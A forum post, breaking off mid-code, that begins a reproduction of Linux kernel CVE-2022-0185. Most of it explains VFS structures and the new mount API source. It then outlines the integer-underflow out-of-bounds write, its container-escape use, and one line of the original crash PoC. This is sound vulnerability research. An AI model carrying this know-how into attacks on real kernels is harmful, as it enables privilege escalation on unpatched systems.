[Linux kernel vulnerability reproduction] CVE-2022-0185

peiwithhao · Posted 2023-10-10 19:03

Last edited by peiwithhao on 2023-10-10 19:05

CVE-2022-0185

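This is my first attempt at analysing a Linux vulnerability, so there are still plenty of shortcomings, and a few of the exploitation techniques have not been fully reproduced.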

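I. Background

The bug was reported by BitsByWill, who won a $31,337 bounty for it (judging by the comments it was originally meant to be 50K and was lowered after some dispute) and used it to escape the container in Google kCTF.

The vulnerability is an integer overflow (an unsigned subtraction that wraps around) in the function that handles one kind of fsconfig parameter in the VFS, and it leads to an out-of-bounds write. The exploitation technique is just as impressive. The original author's blog builds on Fire of Salvation, a challenge he wrote for corCTF 2021; his friend D3V17 wrote a related but harder challenge that same year, Wall of Perdition. Both use msg_msg together with userfaultfd to obtain arbitrary read or write. To carry this over to the present bug, and because unprivileged users can no longer use userfaultfd on recent kernels, FUSE takes the place of userfaultfd. FUSE rarely shows up in CTFs because it needs a fully equipped environment, such as a real machine. BitsByWill also wrote a small FUSE library to help with the exploit, orz.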

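II. Filesystem basics

1. Basic VFS concepts

I had long heard of the virtual filesystem. A typical explanation found online reads:

The VFS (Virtual Filesystem Switch), also called the virtual filesystem, is a kernel software layer that sits as an abstraction above the concrete filesystems. It handles all calls related to POSIX filesystems and offers a common interface to the various filesystems, so that applications can access different filesystems through the same interface. It also serves as the medium through which different filesystems interoperate.

Conceptually this is simple: it resembles programming against an interface in software development. The VFS defines one common interface for all filesystems, so each filesystem only has to be built to that interface and is free to implement the details in its own way.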
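The "program against an interface" idea can be sketched in user space with a table of function pointers. This is only an illustration: `toy_fs_ops`, `toy_ramfs`, `toy_diskfs` and `toy_vfs_read` are made-up names, not kernel APIs, and the real VFS operation tables are far richer.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical miniature of the VFS idea: one shared interface,
 * several independent implementations behind it. */
struct toy_fs_ops {
    const char *name;
    /* Copy up to cap bytes of the file's content into buf; return bytes copied. */
    size_t (*read)(const char *path, char *buf, size_t cap);
};

static size_t copy_text(const char *text, char *buf, size_t cap)
{
    size_t n = strlen(text);
    if (n > cap)
        n = cap;
    memcpy(buf, text, n);
    return n;
}

/* Two toy "filesystems" that answer the same call differently. */
static size_t ramfs_read(const char *path, char *buf, size_t cap)
{
    (void)path;
    return copy_text("from-ram", buf, cap);
}

static size_t diskfs_read(const char *path, char *buf, size_t cap)
{
    (void)path;
    return copy_text("from-disk", buf, cap);
}

const struct toy_fs_ops toy_ramfs  = { "toy_ramfs",  ramfs_read };
const struct toy_fs_ops toy_diskfs = { "toy_diskfs", diskfs_read };

/* The "VFS layer": callers use this one entry point and never
 * need to know which implementation sits underneath. */
size_t toy_vfs_read(const struct toy_fs_ops *fs, const char *path,
                    char *buf, size_t cap)
{
    return fs->read(path, buf, cap);
}
```

Calling `toy_vfs_read(&toy_ramfs, ...)` and `toy_vfs_read(&toy_diskfs, ...)` uses the same code path in the caller, which is the property the VFS gives to system calls.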

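The overall layout inside the OS can be shown with the figure below. I found it on CSDN (I will take it down on request); it is drawn so well that I won't embarrass myself by drawing my own.

The system calls we use every day pass through the VFS first and are carried out through the interface it provides. The actual work is done by whichever concrete filesystem sits underneath, but a user-space programmer sees no real difference. Given how varied filesystems are and how complex the system call surface is, the VFS abstraction layer earns its place.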

2. VFS abstract interface

As mentioned above, the VFS has its own file model, which is what backs the operating system's system calls. The Linux system calls served by the VFS abstraction are:

Filesystem-related: mount, umount, umount2, sysfs, statfs, fstatfs, fstatfs64, ustat
Directory-related: chroot, pivot_root, chdir, fchdir, getcwd, mkdir, rmdir, getdents, getdents64, readdir, link, unlink, rename, lookup_dcookie
Link-related: readlink, symlink
File-related: chown, fchown, lchown, chown16, fchown16, lchown16, chmod, fchmod, utime, stat, fstat, lstat, access, oldstat, oldfstat, oldlstat, stat64, lstat64, fstat64, open, close, creat, umask, dup, dup2, fcntl, fcntl64, select, poll, truncate, ftruncate, truncate64, ftruncate64, lseek, llseek, read, write, readv, writev, sendfile, sendfile64, readahead

3.VFS Common File Model

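This refers to the abstract model of a filesystem. On disk, a sector is commonly 512 bytes, and transfers between memory and disk are slow, so data is usually exchanged in blocks rather than sectors; a block is typically 4 KB.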
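The sector and block sizes quoted above give some simple arithmetic, sketched here. The two constants are the typical values from the text, not something queried from a real device, and the function names are made up for this example.

```c
#include <stdint.h>

#define SECTOR_SIZE 512u   /* bytes per sector, the common value quoted above */
#define BLOCK_SIZE  4096u  /* bytes per block, the usual 4 KB */

/* Number of sectors that make up one block. */
unsigned int sectors_per_block(void)
{
    return BLOCK_SIZE / SECTOR_SIZE;
}

/* Index of the block that contains a given byte offset. */
uint64_t block_of_offset(uint64_t byte_offset)
{
    return byte_offset / BLOCK_SIZE;
}

/* First sector belonging to a given block. */
uint64_t first_sector_of_block(uint64_t block)
{
    return block * sectors_per_block();
}
```

With these values one block spans 8 sectors, so reading a single 4 KB block replaces eight separate sector transfers.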

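The on-disk filesystem stores file information: not only file contents but also metadata such as ownership and permissions. For that purpose the filesystem stores inodes. In the OS I wrote earlier, the inode held things like the sector numbers of the file's data to make access easy. The open system call essentially just brings the inode from disk into memory.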
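The metadata kept in an inode (owner, permissions and so on) is visible from user space through stat(2). A minimal sketch, where `struct inode_info` and `read_inode_info` are names invented for this example:

```c
#include <sys/types.h>
#include <sys/stat.h>

/* Hypothetical helper type: the handful of inode fields discussed above. */
struct inode_info {
    ino_t  ino;   /* inode number */
    mode_t mode;  /* file type and permission bits */
    uid_t  uid;   /* owning user */
    gid_t  gid;   /* owning group */
};

/* Fill *out from the inode behind path. Returns 0 on success, -1 on error. */
int read_inode_info(const char *path, struct inode_info *out)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    out->ino  = st.st_ino;
    out->mode = st.st_mode;
    out->uid  = st.st_uid;
    out->gid  = st.st_gid;
    return 0;
}
```

For instance, `read_inode_info("/", &info)` should succeed and `S_ISDIR(info.mode)` should then be true, since the root is a directory.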

The filesystem model defines four important objects that together make up the common file model; they are introduced in turn below.

1.Superblock

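The superblock, a Unix hallmark, stores the metadata the filesystem needs; think of it as a repository that oversees everything.

Its structure is defined in include/linux/fs.h; have a look if you are interested.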

struct super_block {
        struct list_head        s_list;                /* Keep this first */                 //links the superblocks together
        dev_t                        s_dev;                /* search index; _not_ kdev_t */
        unsigned char                s_blocksize_bits;
        unsigned long                s_blocksize;
        loff_t                        s_maxbytes;        /* Max file size */
        struct file_system_type        *s_type;
        const struct super_operations        *s_op;                                 //function pointers for operating on the filesystem
        const struct dquot_operations        *dq_op;
        const struct quotactl_ops        *s_qcop;
        const struct export_operations *s_export_op;
        unsigned long                s_flags;
        unsigned long                s_iflags;        /* internal SB_I_* flags */
        unsigned long                s_magic;
        struct dentry                *s_root;                                 //root directory entry
        struct rw_semaphore        s_umount;
        int                        s_count;
        atomic_t                s_active;

        ...

} __randomize_layout;

The superblock usually lives at the start of its filesystem. Because Linux can mount several filesystems at once, the s_list field links each superblock to the next.

2.inode

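An inode identifies a file stored on disk. In memory it exists as a VFS inode; the on-disk form may differ somewhat, and the VFS inode may carry fields that are not needed on disk. Some filesystems do not manage files through inodes at all (~~looking at you, FAT and Reiserfs~~); for those, the VFS fills the in-memory inode from whatever filesystem-specific information is available.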

/*
 * Keep mostly read-only and often accessed (especially for
 * the RCU path lookup and 'stat' data) fields at the beginning
 * of the 'struct inode'
 */
struct inode {
        umode_t                        i_mode;
        unsigned short                i_opflags;
        kuid_t                        i_uid;
        kgid_t                        i_gid;
        unsigned int                i_flags;

        ...

} __randomize_layout;

3.dentry

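The dentry cache lets Linux quickly reuse the results of earlier lookups. Once the VFS, together with the filesystem implementation, has read the data of a directory entry (a directory or a file), it creates a dentry instance to cache what it found. The next lookup of that file or directory starts from this cache instead of resolving the name through the filesystem again.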

struct dentry {
        /* RCU lookup touched fields */
        unsigned int d_flags;                /* protected by d_lock */
        seqcount_spinlock_t d_seq;        /* per dentry seqlock */
        struct hlist_bl_node d_hash;        /* lookup hash list */
        struct dentry *d_parent;        /* parent directory */
        struct qstr d_name;
        struct inode *d_inode;                /* inode this name belongs to, NULL if there is none */
        unsigned char d_iname[DNAME_INLINE_LEN];        /* small names */

        /* Ref lookup also touches following */
        struct lockref d_lockref;        /* per-dentry lock and refcount */
        const struct dentry_operations *d_op;
        struct super_block *d_sb;        /* The root of the dentry tree */
        unsigned long d_time;                /* used by d_revalidate */
        void *d_fsdata;                        /* fs-specific data */

        union {
                struct list_head d_lru;                /* LRU list */
                wait_queue_head_t *d_wait;        /* in-lookup ones only */
        };
        struct list_head d_child;        /* child of parent list */
        struct list_head d_subdirs;        /* our children */
        /*
         * d_alias and d_rcu can share memory
         */
        union {
                struct hlist_node d_alias;        /* inode alias list */
                struct hlist_bl_node d_in_lookup_hash;        /* only for in-lookup ones */
                 struct rcu_head d_rcu;
        } d_u;
} __randomize_layout;

4. The traditional mount system call

We normally mount a filesystem with mount; here is what the Linux manual says

SYNOPSIS
       mount [-h|-V]

       mount [-l] [-t fstype]

       mount -a [-fFnrsvw] [-t fstype] [-O optlist]

       mount [-fnrsvw] [-o options] device|mountpoint

       mount [-fnrsvw] [-t fstype] [-o options] device mountpoint

       mount --bind|--rbind|--move olddir newdir

       mount --make-[shared|slave|private|unbindable|rshared|rslave|rprivate|runbindable] mountpoint

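We usually mount with a command like this

mount -t xfs /dev/sdb1 /mnt/temp

This mounts the filesystem on the device /dev/sdb1 as xfs at the directory /mnt/temp. The filesystem thereby joins the file tree under the root directory /, and only then can we access its contents normally. Windows has mount operations too, but hides them to keep things simple for users.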

Besides the command-line mount, let's look at the mount system call used from code. The manual page:

man 2 mount

mount(2)                                                                                              System Calls Manual                                                                                              mount(2)

NAME
       mount - mount filesystem

LIBRARY
       Standard C library (libc, -lc)

SYNOPSIS
       #include <sys/mount.h>

       int mount(const char *source, const char *target,
                 const char *filesystemtype, unsigned long mountflags,
                 const void *_Nullable data);

DESCRIPTION
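       mount() attaches the filesystem specified by source (which is often a pathname referring to a device, but can also be the pathname of a directory or file, or a dummy string) to the location (a directory or file) specified by the pathname in target.

       Appropriate privilege (Linux: the CAP_SYS_ADMIN capability) is required to mount filesystems.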

       Values for the filesystemtype argument supported by the kernel are listed in /proc/filesystems (e.g., "btrfs", "ext4", "jfs", "xfs", "vfat", "fuse", "tmpfs", "cgroup", "proc",  "mqueue",  "nfs",  "cifs",  "iso9660").
       Further types may become available when the appropriate modules are loaded.

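       The data argument is interpreted by the different filesystems.  Typically it is a string of comma-separated options understood by this filesystem.  See mount(8) for details of the options available for each filesystem type.  This argument may be specified as NULL, if there are no options.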

       A call to mount() performs one of a number of general types of operation, depending on the bits specified in mountflags.  The choice of which operation to perform is determined by testing the bits set in  mountflags,
       with the tests being conducted in the order listed here:

       •  Remount an existing mount: mountflags includes MS_REMOUNT.

       •  Create a bind mount: mountflags includes MS_BIND.

       •  Change the propagation type of an existing mount: mountflags includes one of MS_SHARED, MS_PRIVATE, MS_SLAVE, or MS_UNBINDABLE.

       •  Move an existing mount to a new location: mountflags includes MS_MOVE.

       •  Create a new mount: mountflags includes none of the above flags.

       Each of these operations is detailed later in this page.  Further flags may be specified in mountflags to modify the behavior of mount(), as described below.
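The manual excerpt notes that the supported filesystemtype values are listed in /proc/filesystems. That file has one type per line, optionally preceded by the word nodev, with a tab before the type name. A small sketch of checking such a listing for a given type follows; `fs_type_listed` is a name made up here, and it works on text already read into memory so that it stays independent of the machine it runs on.

```c
#include <stddef.h>
#include <string.h>

/* Return 1 if name appears as a filesystem type in listing, 0 otherwise.
 * listing is text in the /proc/filesystems layout: each line is an
 * optional "nodev", then a tab, then the type name. */
int fs_type_listed(const char *listing, const char *name)
{
    size_t name_len = strlen(name);
    const char *line = listing;

    while (*line) {
        const char *end = strchr(line, '\n');
        size_t line_len = end ? (size_t)(end - line) : strlen(line);
        const char *type = line;

        /* The type name is whatever follows the last tab on the line. */
        for (size_t i = 0; i < line_len; i++)
            if (line[i] == '\t')
                type = line + i + 1;

        size_t type_len = line_len - (size_t)(type - line);
        if (type_len == name_len && memcmp(type, name, name_len) == 0)
            return 1;

        line = end ? end + 1 : line + line_len;
    }
    return 0;
}
```

To use it on a live system, read /proc/filesystems into a NUL-terminated buffer (for example with fopen and fread) and pass that buffer as listing.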

5. Registering a filesystem

1. Defining the filesystem type (file_system_type)

Before registering, we first define a struct file_system_type describing our filesystem type

struct file_system_type {
        const char *name;
        int fs_flags;
#define FS_REQUIRES_DEV                1 
#define FS_BINARY_MOUNTDATA        2
#define FS_HAS_SUBTYPE                4
#define FS_USERNS_MOUNT                8        /* Can be mounted by userns root */
#define FS_DISALLOW_NOTIFY_PERM        16        /* Disable fanotify permission events */
#define FS_RENAME_DOES_D_MOVE        32768        /* FS will handle d_move() during rename() internally. */
        int (*init_fs_context)(struct fs_context *);
        const struct fs_parameter_description *parameters;
        struct dentry *(*mount) (struct file_system_type *, int,
                       const char *, void *);
        void (*kill_sb) (struct super_block *);
        struct module *owner;
        struct file_system_type * next;
        struct hlist_head fs_supers;

        struct lock_class_key s_lock_key;
        struct lock_class_key s_umount_key;
        struct lock_class_key s_vfs_rename_key;
        struct lock_class_key s_writers_key[SB_FREEZE_LEVELS];

        struct lock_class_key i_lock_key;
        struct lock_class_key i_mutex_key;
        struct lock_class_key i_mutex_dir_key;
};

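The fields are explained below

name: the filesystem's name, e.g. ext2/3, xfs
fs_flags: filesystem type flags
- FS_REQUIRES_DEV: the filesystem must live on a physical device (the /proc filesystem, for example, does not)
- FS_BINARY_MOUNTDATA: the mount data is in binary form
- FS_HAS_SUBTYPE: the filesystem has a subtype, which is extracted from the name and passed in as a parameter. The most common case is FUSE: FUSE is not really a filesystem itself, so subtypes are used to tell apart the different filesystems implemented through the FUSE interface.
- FS_USERNS_MOUNT: can be mounted by the root user of a user namespace
- FS_RENAME_DOES_D_MOVE: the filesystem handles d_move() itself during rename()
mount(): replaces the earlier get_sb() (sb being the superblock); it is the callback invoked when a user mounts this filesystem
kill_sb(): tears down the in-memory superblock; used when unmounting the filesystem
owner: the module that implements this filesystem, usually given as the THIS_MODULE macro
next: the next filesystem type in the list
fs_supers: the superblocks of all filesystems of this type are chained under this list head

Once the filesystem type structure is defined, the filesystem has to be registered with the kernel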

2. Registering the filesystem

Start with the source in fs/filesystems.c

The file holds the filesystem-type registry; near its top a global variable is defined

static struct file_system_type *file_systems;

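Its type is a pointer to file_system_type; this global points to the head of the list of all filesystem types currently registered in the kernel

Now the registration function itself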

/**
 *        register_filesystem - register a new filesystem
 *        @fs: the file system structure
 *
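 *        Adds the file system passed to the list of file systems the kernel
 *        is aware of for mount and other syscalls. Returns 0 on success,
 *        or a negative errno code on an error.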
 *
 *        The &struct file_system_type that is passed is linked into the kernel 
 *        structures and must not be freed until the file system has been
 *        unregistered.
 */

int register_filesystem(struct file_system_type * fs)
{
        int res = 0;
        struct file_system_type ** p;

        if (fs->parameters && !fs_validate_description(fs->parameters))
                return -EINVAL;

        BUG_ON(strchr(fs->name, '.'));
        if (fs->next)
                return -EBUSY;
        write_lock(&file_systems_lock);
        p = find_filesystem(fs->name, strlen(fs->name));
        if (*p)
                res = -EBUSY;
        else
                *p = fs;
        write_unlock(&file_systems_lock);
        return res;
}

The key function here is find_filesystem; let's follow it

static struct file_system_type **find_filesystem(const char *name, unsigned len)
{
        struct file_system_type **p;
        for (p = &file_systems; *p; p = &(*p)->next)
                if (strncmp((*p)->name, name, len) == 0 &&
                    !(*p)->name[len])
                        break;
        return p;
}

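It simply walks the chain that starts at the global file_systems and compares names. It returns a pointer to the slot holding the matching file_system_type, or to the empty next slot at the tail when nothing matches.

So register_filesystem first looks the type up by name. If it is not registered yet, the new type is linked onto the tail of the global list; if it already is, -EBUSY is returned.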
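The pointer-to-pointer walk is what lets one lookup serve both "already registered" and "append at the tail". A user-space model of the same logic is sketched below; the `toy_` names are invented for this example and the kernel's locking (file_systems_lock) is deliberately left out.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

/* Toy stand-in for struct file_system_type: only the fields the list needs. */
struct toy_fs_type {
    const char *name;
    struct toy_fs_type *next;
};

static struct toy_fs_type *toy_file_systems;  /* head of the singly linked list */

/* Return the slot that points at the entry called name, or the NULL slot
 * at the tail of the list when no such entry exists. */
static struct toy_fs_type **toy_find(const char *name)
{
    struct toy_fs_type **p;

    for (p = &toy_file_systems; *p; p = &(*p)->next)
        if (strcmp((*p)->name, name) == 0)
            break;
    return p;
}

/* Model of register_filesystem: 0 on success, -EBUSY on a duplicate name
 * or when fs is already linked into a list. No locking in this sketch. */
int toy_register(struct toy_fs_type *fs)
{
    struct toy_fs_type **p;

    if (fs->next)
        return -EBUSY;
    p = toy_find(fs->name);
    if (*p)
        return -EBUSY;
    *p = fs;          /* p is the tail slot, so this appends */
    return 0;
}
```

Because `toy_find` returns the address of a slot rather than an entry, the append is a single assignment and needs no special case for an empty list.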

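Only after this function runs is our filesystem module registered with the kernel; from then on it can be mounted with the mount system call

6. The new-generation VFS mount API

Some people felt the old mount system call had many shortcomings. Until they called for an overhaul, the traditional mount() had been in wide use, with small changes over time but the same interface. Behind the scenes, however, Al Viro of the VFS camp had long been unhappy with it and wanted change. The plan went public at LSFMM 2018, where they called for a complete rewrite of the mount system call interface and pointed to a series of hard-to-fix flaws and bugs in the traditional mount. The new mount API was merged into mainline in Linux 5.2.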

new mount API introduce

The above is quoted from arttnba3's reproduction blog post :dog:

# mkfs.xfs -f /dev/sdb1
# cat old-mount-xfs.c
#include <sys/mount.h>  
#include <stdio.h>  

int main(int argc, char *argv[]) {  
        if (mount("/dev/sdb1", "/mnt/scratch", "xfs", 0, NULL)) {  
                perror("mount failed");  
        }
        return 0;  
}

# gcc -Wall -o old-mount-xfs old-mount-xfs.c
# ./old-mount-xfs
# cat /proc/mounts |grep sdb1
/dev/sdb1 /mnt/scratch xfs rw,seclabel,relatime,attr2,inode64,noquota 0 0

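As shown above, the traditional mount system call is easy to use: a single call to that function is enough. With the new mount API, the formerly bloated, catch-all mount system call is broken up into small pieces, each implemented separately.

According to the official documentation, the new mount API is used in the following steps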

        fd = fsopen("nfs");
        fsconfig(fd, FSCONFIG_SET_STRING, "option", "val", 0);
        fsconfig(fd, FSCONFIG_CMD_CREATE, NULL, NULL, 0);
        mfd = fsmount(fd, MS_NODEV);
        move_mount(mfd, "", AT_FDCWD, "/mnt", MOVE_MOUNT_F_EMPTY_PATH);

Each call is covered in turn below (the reproduction targets 5.4, so the source below is taken from Linux 5.4.101)

1. fsopen (opening a filesystem type)

/*
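 * Open a filesystem by name so that it can be configured for mounting.
 *
 * We are allowed to specify a container in which the filesystem will be
 * opened, thereby indicating which namespaces will be used (notably, which
 * network namespace will be used for network filesystems).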
 */
SYSCALL_DEFINE2(fsopen, const char __user *, _fs_name, unsigned int, flags)
{
        struct file_system_type *fs_type;
        struct fs_context *fc;
        const char *fs_name;
        int ret;

        if (!ns_capable(current->nsproxy->mnt_ns->user_ns, CAP_SYS_ADMIN))
                return -EPERM;

        if (flags & ~FSOPEN_CLOEXEC)
                return -EINVAL;

        fs_name = strndup_user(_fs_name, PAGE_SIZE);
        if (IS_ERR(fs_name))
                return PTR_ERR(fs_name);

        fs_type = get_fs_type(fs_name);                 //look up the file_system_type by the name passed in
        kfree(fs_name);
        if (!fs_type)
                return -ENODEV;

        fc = fs_context_for_mount(fs_type, 0);         //prepare a mount context from fs_type

        ...

}

Note that fsopen does not open a concrete on-disk filesystem; it opens a filesystem type (file_system_type)

fs_context_for_mount

fsopen then calls fs_context_for_mount, which in turn calls alloc_fs_context with the following arguments:

enum fs_context_purpose {
        FS_CONTEXT_FOR_MOUNT,                /* New superblock for explicit mount */
        FS_CONTEXT_FOR_SUBMOUNT,        /* New superblock for automatic submount */
        FS_CONTEXT_FOR_RECONFIGURE,        /* Superblock reconfiguration (remount) */
};

struct fs_context *fs_context_for_mount(struct file_system_type *fs_type,
                                        unsigned int sb_flags)
{
        return alloc_fs_context(fs_type, NULL, sb_flags, 0,
                                        FS_CONTEXT_FOR_MOUNT);
}

alloc_fs_context

/**
 * alloc_fs_context - Create a filesystem context.
 * @fs_type: The filesystem type.
 * @reference: The dentry from which this one derives (or NULL)
 * @sb_flags: Filesystem/superblock flags (SB_*)
 * @sb_flags_mask: Applicable members of @sb_flags
 * @purpose: The purpose that this configuration shall be used for.
 *
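 * Open a filesystem and create a mount context.  The mount context is
 * initialised with the supplied flags and, if a submount/automount from
 * another superblock (referred to by @reference) is supplied, may have
 * parameters such as namespaces copied across from that superblock.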
 */
static struct fs_context *alloc_fs_context(struct file_system_type *fs_type,
                                      struct dentry *reference,
                                      unsigned int sb_flags,
                                      unsigned int sb_flags_mask,
                                      enum fs_context_purpose purpose)
{
        int (*init_fs_context)(struct fs_context *);
        struct fs_context *fc;
        int ret = -ENOMEM;

        fc = kzalloc(sizeof(struct fs_context), GFP_KERNEL_ACCOUNT);
        if (!fc)
                return ERR_PTR(-ENOMEM);

        fc->purpose        = purpose;
        fc->sb_flags        = sb_flags;
        fc->sb_flags_mask = sb_flags_mask;
        fc->fs_type        = get_filesystem(fs_type);
        fc->cred        = get_current_cred();
        fc->net_ns        = get_net(current->nsproxy->net_ns);
        fc->log.prefix        = fs_type->name;

        mutex_init(&fc->uapi_mutex);

        switch (purpose) {
        case FS_CONTEXT_FOR_MOUNT:
                fc->user_ns = get_user_ns(fc->cred->user_ns);
                break;
        case FS_CONTEXT_FOR_SUBMOUNT:
                fc->user_ns = get_user_ns(reference->d_sb->s_user_ns);
                break;
        case FS_CONTEXT_FOR_RECONFIGURE:
                atomic_inc(&reference->d_sb->s_active);
                fc->user_ns = get_user_ns(reference->d_sb->s_user_ns);
                fc->root = dget(reference);
                break;
        }

        /* TODO: Make all filesystems support this unconditionally */
        init_fs_context = fc->fs_type->init_fs_context;
        if (!init_fs_context)
                init_fs_context = legacy_init_fs_context;

        ret = init_fs_context(fc);
        if (ret < 0)
                goto err_fc;
        fc->need_free = true;
        return fc;

err_fc:
        put_fs_context(fc);
        return ERR_PTR(ret);
}

The code first uses kzalloc to allocate an fs_context structure, i.e. a filesystem context, shown below:

The fs_context structure

/*
 * Filesystem context for holding the parameters used in the creation or
 * reconfiguration of a superblock.
 *
 * Superblock creation fills in ->root whereas reconfiguration begins with this
 * already set.
 *
 * See Documentation/filesystems/mount_api.rst
 */
struct fs_context {
        const struct fs_context_operations *ops;
        struct mutex                uapi_mutex;        /* Userspace access mutex */
        struct file_system_type        *fs_type;          /* The filesystem type */
        void                        *fs_private;        /* The filesystem's context */
        void                        *sget_key;
        struct dentry                *root;                /* The root and superblock */
        struct user_namespace        *user_ns;        /* The user namespace for this mount */
        struct net                *net_ns;        /* The network namespace for this mount */
        const struct cred        *cred;                /* The mounter's credentials */
        struct p_log                log;                /* Logging buffer */
        const char                *source;        /* The source name (eg. dev path) */
        void                        *security;        /* Linux S&M options */
        void                        *s_fs_info;        /* Proposed s_fs_info */
        unsigned int                sb_flags;        /* Proposed superblock flags (SB_*) */
        unsigned int                sb_flags_mask;        /* Superblock flags that were changed */
        unsigned int                s_iflags;        /* OR'd with sb->s_iflags */
        unsigned int                lsm_flags;        /* Information flags from the fs to the LSM */
        enum fs_context_purpose        purpose:8;
        enum fs_context_phase        phase:8;        /* The phase the context is in */
        bool                        need_free:1;        /* Need to call ops->free() */
        bool                        global:1;        /* Goes into &init_user_ns */
        bool                        oldapi:1;        /* Coming from mount(2) */
};

Toward the end of the code above there is this fragment

        ...
        /* TODO: Make all filesystems support this unconditionally */
        init_fs_context = fc->fs_type->init_fs_context;
        if (!init_fs_context)
                init_fs_context = legacy_init_fs_context;

        ret = init_fs_context(fc);
        ...

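This calls fs_type->init_fs_context. Many filesystems leave that pointer unset, in which case init_fs_context falls back to legacy_init_fs_context (covered later, at the start of the vulnerability walkthrough). The pointer is a field added for the new mount API. The call finishes initialising the newly created fs_context, which is then returned to the fsopen system call.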
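The fallback is an ordinary "use the default when the hook is NULL" pattern. A user-space model is sketched below; every `toy_` name is invented for this illustration, and the only thing the toy initialisers do is record which path was taken.

```c
#include <stddef.h>

/* Toy context: remembers which set of operations initialised it. */
struct toy_ctx {
    const char *ops_name;
};

/* Toy filesystem type: the init hook may be left NULL, as many real
 * filesystems did with init_fs_context. */
struct toy_type {
    const char *name;
    int (*init_fs_context)(struct toy_ctx *ctx);
};

static int toy_legacy_init(struct toy_ctx *ctx)
{
    ctx->ops_name = "legacy";
    return 0;
}

static int toy_native_init(struct toy_ctx *ctx)
{
    ctx->ops_name = "native";
    return 0;
}

/* Mirrors the tail of alloc_fs_context: pick the type's own hook,
 * or the legacy one when the hook is missing. */
int toy_alloc_context(const struct toy_type *type, struct toy_ctx *ctx)
{
    int (*init)(struct toy_ctx *) = type->init_fs_context;

    if (!init)
        init = toy_legacy_init;
    return init(ctx);
}

const struct toy_type toy_new_style = { "newfs", toy_native_init };
const struct toy_type toy_old_style = { "oldfs", NULL };
```

A type like `toy_old_style` ends up on the legacy path without doing anything itself, which is why so many filesystems were reachable through the legacy parameter parser.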

So let's continue with the second half of fsopen


        ...

        put_filesystem(fs_type);
        if (IS_ERR(fc))
                return PTR_ERR(fc);

        fc->phase = FS_CONTEXT_CREATE_PARAMS;

        ret = fscontext_alloc_log(fc);
        if (ret < 0)
                goto err_fc;

        return fscontext_create_fd(fc, flags & FSOPEN_CLOEXEC ? O_CLOEXEC : 0);

err_fc:
        put_fs_context(fc);
        return ret;
}

First it calls fscontext_alloc_log(fc), which allocates the log buffer for this filesystem context and points the log's owner at the owner module of the current file_system_type

Next comes fscontext_create_fd, with the following call chain

fscontext_create_fd(fc, flags & FSOPEN_CLOEXEC ? O_CLOEXEC : 0)
        anon_inode_getfd("[fscontext]", &fscontext_fops, fc, O_RDWR | o_flags)
                __anon_inode_getfd(name, fops, priv, flags, NULL, false)

Its job is to return an fd tied to the filesystem context (and through it to the filesystem type), just like opening a file

__anon_inode_getfd

const struct file_operations fscontext_fops = {
        .read                = fscontext_read,
        .release        = fscontext_release,
        .llseek                = no_llseek,
};

static int __anon_inode_getfd(const char *name,
                              const struct file_operations *fops,
                              void *priv, int flags,                                         //priv is the fs_context created earlier
                              const struct inode *context_inode,                 //NULL here: an anonymous inode
                              bool secure)
{
        int error, fd;
        struct file *file;

        error = get_unused_fd_flags(flags);         //grab a free file descriptor
        if (error < 0)
                return error;
        fd = error;

        file = __anon_inode_getfile(name, fops, priv, flags, context_inode, secure);  //get a [fscontext] file instance whose file operations are set to "fscontext_fops"
        if (IS_ERR(file)) {
                error = PTR_ERR(file);
                goto err_put_unused_fd;
        }
        fd_install(fd, file);

        return fd;

err_put_unused_fd:
        put_unused_fd(fd);
        return error;
}

Overall, this function creates a [fscontext] file instance and returns its fd. This is also where the link to our earlier fs_context is made; the key function is

__anon_inode_getfile(name, fops, priv, flags, context_inode, secure)

which contains this line

file->private_data = priv;

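The file's private_data is set to priv, which, as shown earlier, points at the fs_context created before. Through this link, the file's dedicated file operations can act on the context.

To summarise the steps of fsopen

Look up the matching filesystem type
Build the filesystem context (fs_context) and link it to that file_system_type through a field
Obtain a [fscontext] file, linked to the fs_context through a field, whose function pointers come from a global operations table
Return that file's descriptor fd; all later operations go through it

The call chain is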

sys_fsopen
        get_fs_type                 //look up fs_type
        fs_context_for_mount
                alloc_fs_context         //allocate the fs_context and initialise some fields
        fscontext_alloc_log         
        fscontext_create_fd         
                anon_inode_getfd
                        __anon_inode_getfd         //create the file, link it to the fs_context, return the fd

2.fsconfig

/**
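 * sys_fsconfig - Set parameters and trigger actions on a context
 * @fd: The fd associated with the filesystem context obtained from fsopen
 * @cmd: The command
 * @_key: The key
 * @_value: The value
 * @aux: Additional information for the value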
 *
 * This system call is used to set parameters on a context, including
 * superblock settings, data source and security labelling.
 *
 * Actions include triggering the creation of a superblock and the
 * reconfiguration of the superblock attached to the specified context.
 *
 * When setting a parameter, @cmd indicates the type of value being proposed
 * and @_key indicates the parameter to be altered.
 *
 * @_value and @aux are used to specify the value, should a value be required:
 *
 * (*) fsconfig_set_flag: No value is specified.  The parameter must be boolean
 *     in nature.  The key may be prefixed with "no" to invert the
 *     setting. @_value must be NULL and @aux must be 0.
 *
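 * (*) fsconfig_set_string: A string value is specified.  The parameter can be
 *     expecting a boolean, integer, string or take a path.  A conversion to an
 *     appropriate type will be attempted (which may include looking up as a
 *     path).  @_value points to a NUL-terminated string and @aux must be 0.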
 *
 * (*) fsconfig_set_binary: A binary blob is specified.  @_value points to the
 *     blob and @aux indicates its size.  The parameter must be expecting a
 *     blob.
 *
 * (*) fsconfig_set_path: A non-empty path is specified.  The parameter must be
 *     expecting a path object.  @_value points to a NUL-terminated string that
 *     is the path and @aux is a file descriptor at which to start a relative
 *     lookup or AT_FDCWD.
 *
 * (*) fsconfig_set_path_empty: As fsconfig_set_path, but with AT_EMPTY_PATH
 *     implied.
 *
 * (*) fsconfig_set_fd: An open file descriptor is specified.  @_value must be
 *     NULL and @aux indicates the file descriptor.
 */
SYSCALL_DEFINE5(fsconfig,
                int, fd,
                unsigned int, cmd,
                const char __user *, _key,
                const void __user *, _value,
                int, aux)
{
        struct fs_context *fc;
        struct fd f;
        int ret;
        int lookup_flags = 0;

...

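III. The vulnerability

The bug affects kernels from 5.1 and persisted at least until 5.16. It was found by syzbot and then exploited. In his blog the finder first gives a crash PoC, but I could not trigger it on a 5.4 kernel, so below I analyse the vulnerable call chain and write my own trigger PoC.

1. The crash chain

fsopen has already been covered in detail: it just returns an fd tied to an fs_context. What matters is the fsconfig system call that follows.

The finder's PoC calls the following line over and over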

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

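Here cmd is FSCONFIG_SET_STRING. Note that neither the key nor the value may be NULL, otherwise the call returns an error straight away; feel free to check the source.

We only care about the call chain that follows. Inside the fsconfig system call, execution reaches this code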


        struct fs_parameter param = {
